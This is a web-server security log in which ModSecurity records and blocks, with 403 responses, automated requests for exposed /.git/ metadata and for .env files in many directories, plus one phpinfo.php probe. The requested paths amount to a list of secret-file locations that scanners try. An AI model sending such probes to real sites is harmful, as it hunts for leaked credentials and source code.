[Mon May 11 11:43:04.980845 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:65372] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/description"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/description"] [unique_id "agGkqERdw2n9wv6Ai48E3QAAAJY"]
[Mon May 11 11:43:04.981643 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:65372] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/description"] [unique_id "agGkqERdw2n9wv6Ai48E3QAAAJY"]
[Mon May 11 11:43:06.164982 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:65372] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkqERdw2n9wv6Ai48E3QAAAJY"]
[Mon May 11 11:43:06.190632 2026] [security2:error] [pid 1254212:tid 1254218] [client 185.177.72.9:65378] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/description"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/description"] [unique_id "agGkqkYQeUtAPynIs6xVYQAAAAQ"]
[Mon May 11 11:43:06.191647 2026] [security2:error] [pid 1254212:tid 1254218] [client 185.177.72.9:65378] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/description"] [unique_id "agGkqkYQeUtAPynIs6xVYQAAAAQ"]
[Mon May 11 11:43:07.427446 2026] [security2:error] [pid 1254212:tid 1254218] [client 185.177.72.9:65378] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkqkYQeUtAPynIs6xVYQAAAAQ"]
[Mon May 11 11:43:07.453246 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:65384] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/fetch_head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/FETCH_HEAD"] [unique_id "agGkq2S6k_SCYd1AVZqrrQAAAQ8"]
[Mon May 11 11:43:07.453454 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:65384] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/FETCH_HEAD"] [unique_id "agGkq2S6k_SCYd1AVZqrrQAAAQ8"]
[Mon May 11 11:43:08.631241 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:65384] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkq2S6k_SCYd1AVZqrrQAAAQ8"]
[Mon May 11 11:43:08.657263 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:65390] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/fetch_head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/FETCH_HEAD"] [unique_id "agGkrL4KNmD_mZ_vlf81WgAAAFM"]
[Mon May 11 11:43:08.658516 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:65390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/FETCH_HEAD"] [unique_id "agGkrL4KNmD_mZ_vlf81WgAAAFM"]
[Mon May 11 11:43:09.876600 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:65390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkrL4KNmD_mZ_vlf81WgAAAFM"]
[Mon May 11 11:43:09.908711 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:65396] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/orig_head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/ORIG_HEAD"] [unique_id "agGkrb4KNmD_mZ_vlf81WwAAAE0"]
[Mon May 11 11:43:09.909522 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:65396] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/ORIG_HEAD"] [unique_id "agGkrb4KNmD_mZ_vlf81WwAAAE0"]
[Mon May 11 11:43:11.085936 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:65396] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkrb4KNmD_mZ_vlf81WwAAAE0"]
[Mon May 11 11:43:11.117090 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:65406] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/orig_head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/ORIG_HEAD"] [unique_id "agGkr0Rdw2n9wv6Ai48E4QAAAIo"]
[Mon May 11 11:43:11.117506 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:65406] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/ORIG_HEAD"] [unique_id "agGkr0Rdw2n9wv6Ai48E4QAAAIo"]
[Mon May 11 11:43:12.343376 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:65406] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkr0Rdw2n9wv6Ai48E4QAAAIo"]
[Mon May 11 11:43:34.133451 2026] [security2:error] [pid 1254212:tid 1254225] [client 213.209.159.175:3164] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agGkxkYQeUtAPynIs6xViAAAAAs"]
[Mon May 11 11:43:34.133880 2026] [security2:error] [pid 1254212:tid 1254225] [client 213.209.159.175:3164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agGkxkYQeUtAPynIs6xViAAAAAs"]
[Mon May 11 11:43:34.139498 2026] [security2:error] [pid 1254212:tid 1254225] [client 213.209.159.175:3164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxkYQeUtAPynIs6xViAAAAAs"]
[Mon May 11 11:43:34.185724 2026] [security2:error] [pid 1254328:tid 1254337] [client 213.209.159.175:3166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/.env"] [unique_id "agGkxkRdw2n9wv6Ai48FAgAAAIY"]
[Mon May 11 11:43:34.186104 2026] [security2:error] [pid 1254328:tid 1254337] [client 213.209.159.175:3166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/.env"] [unique_id "agGkxkRdw2n9wv6Ai48FAgAAAIY"]
[Mon May 11 11:43:34.188191 2026] [security2:error] [pid 1254328:tid 1254337] [client 213.209.159.175:3166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxkRdw2n9wv6Ai48FAgAAAIY"]
[Mon May 11 11:43:34.232725 2026] [security2:error] [pid 1254179:tid 1254192] [client 213.209.159.175:3178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/backend/.env"] [unique_id "agGkxmS6k_SCYd1AVZqrywAAAQs"]
[Mon May 11 11:43:34.232960 2026] [security2:error] [pid 1254179:tid 1254192] [client 213.209.159.175:3178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/backend/.env"] [unique_id "agGkxmS6k_SCYd1AVZqrywAAAQs"]
[Mon May 11 11:43:34.237493 2026] [security2:error] [pid 1254179:tid 1254192] [client 213.209.159.175:3178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxmS6k_SCYd1AVZqrywAAAQs"]
[Mon May 11 11:43:34.280314 2026] [:error] [pid 1254242:tid 1254269] [client 213.209.159.175:3186] File does not exist: /var/www/html/phpinfo.php
[Mon May 11 11:43:34.382298 2026] [security2:error] [pid 1254212:tid 1254229] [client 213.209.159.175:3212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/admin/.env"] [unique_id "agGkxkYQeUtAPynIs6xViQAAAA8"]
[Mon May 11 11:43:34.382521 2026] [security2:error] [pid 1254212:tid 1254229] [client 213.209.159.175:3212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/admin/.env"] [unique_id "agGkxkYQeUtAPynIs6xViQAAAA8"]
[Mon May 11 11:43:34.383843 2026] [security2:error] [pid 1254212:tid 1254229] [client 213.209.159.175:3212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxkYQeUtAPynIs6xViQAAAA8"]
[Mon May 11 11:43:34.434945 2026] [security2:error] [pid 1254133:tid 1254144] [client 213.209.159.175:3218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/laravel/.env"] [unique_id "agGkxhjZymfuKpjWXeh5xQAAAMg"]
[Mon May 11 11:43:34.435184 2026] [security2:error] [pid 1254133:tid 1254144] [client 213.209.159.175:3218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/laravel/.env"] [unique_id "agGkxhjZymfuKpjWXeh5xQAAAMg"]
[Mon May 11 11:43:34.439084 2026] [security2:error] [pid 1254133:tid 1254144] [client 213.209.159.175:3218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxhjZymfuKpjWXeh5xQAAAMg"]
[Mon May 11 11:43:34.527794 2026] [security2:error] [pid 1254179:tid 1254184] [client 213.209.159.175:3244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.example"] [unique_id "agGkxmS6k_SCYd1AVZqrzAAAAQM"]
[Mon May 11 11:43:34.528008 2026] [security2:error] [pid 1254179:tid 1254184] [client 213.209.159.175:3244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.example"] [unique_id "agGkxmS6k_SCYd1AVZqrzAAAAQM"]
[Mon May 11 11:43:34.529432 2026] [security2:error] [pid 1254179:tid 1254184] [client 213.209.159.175:3244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxmS6k_SCYd1AVZqrzAAAAQM"]
[Mon May 11 11:43:34.552387 2026] [security2:error] [pid 1254179:tid 1254184] [client 213.209.159.175:3244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/core/.env"] [unique_id "agGkxmS6k_SCYd1AVZqrzQAAAQM"]
[Mon May 11 11:43:34.552586 2026] [security2:error] [pid 1254179:tid 1254184] [client 213.209.159.175:3244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/core/.env"] [unique_id "agGkxmS6k_SCYd1AVZqrzQAAAQM"]
[Mon May 11 11:43:34.553230 2026] [security2:error] [pid 1254179:tid 1254184] [client 213.209.159.175:3244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxmS6k_SCYd1AVZqrzQAAAQM"]
